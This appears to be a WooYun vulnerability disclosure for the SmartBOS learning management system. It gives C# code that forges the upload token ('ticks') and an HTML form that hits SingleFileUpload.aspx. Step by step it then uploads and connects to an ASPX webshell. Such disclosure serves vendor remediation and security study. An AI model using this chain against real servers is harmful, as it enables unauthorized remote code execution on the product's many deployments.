WooYun.org

该系统是新为软件的smartbos管理系统，新为软件是目前中国最大的学习管理软件提供商之一。该系统的使用量非常之大，先来看看官方给的使用情况吧
企业：http://**.**.**.**/case_enterprise.html
教育：http://**.**.**.**/case_college.html
政府：http://**.**.**.**/case_government.html
部分案例截个图

1、由于配置不当，致使某个上传页面可以访问，虽然在上传时需要验证参数ticks，但是经过多次尝试，破解了该ticks的计算方法，可以成功文件上传页面。
2、上传时需要提供网站的绝对路径，这里通过破解的ticks可以成功得到网站的绝对路径。首先说明如何突破参数ticks的限制，看到这个参数的名字，应该差不多猜到了这里是对时间进行了一次验证，通过多次的尝试与猜解，最后判断出该参数ticks是这样计算出来的：

为了审核大大测试方便，把C#的代码也贴上吧

public static string Encode()
        {
            string str = DateTime.Now.ToString("yyyy-MM-dd HH:mm:ss");
            int num = new Random(Guid.NewGuid().GetHashCode()).Next(10);
            string str2 = num.ToString();
            for (int i = 0; i < str.Length; i++)
            {
                string str3 = (str[i] + num).ToString("x4");
                str2 = str2 + str3;
            }           
            return str2;
        }

上面的Encode方法的返回值，即为参数ticks的值，可以看出，ticks的计算是以当前时间为基础的，经过测试，该值在一个小时内可用，若超过一个小时，需要重新运行Encode方法计算ticks的值。
下面说下ticks是如何使用的：
先写个页面来获取网站的绝对路径，如下：

代码也贴这里吧

<form method="post" action="http://**.**.**.**/fileservice/SingleFileUpload.aspx?openerName=ResFileManager&TargetRootPath=&upDirectory=&ticks=6003800360037003b00330037003700330037003800260036003800400038003a0040003a003f">
<input type="submit" name="test">
</form>

请仔细看图中的标注，把运行Encode方法计算的ticks替换上图中的ticks，这样提交后，会得到一个如下的页面：

查看页面源码可以找到网站的绝对路径

然后选择马儿进行上传，会发送两个包，burp抓第二个包，可以看到在上一步获得的网站绝对路径，这里一般不用修改，直接Forward，（如果修改的话，经过测试发现，随着ticks第一位数字的不同，修改后的路径可能生效，也可能无效，原因未知）如下图

完成上传，若上传路径未修改，上传后的路径为：D:\Newway\SmartExam\Web\fileroot\attack.aspx
访问路径为：http://**.**.**.**/fileroot/attack.aspx
用刀连接之

点到为止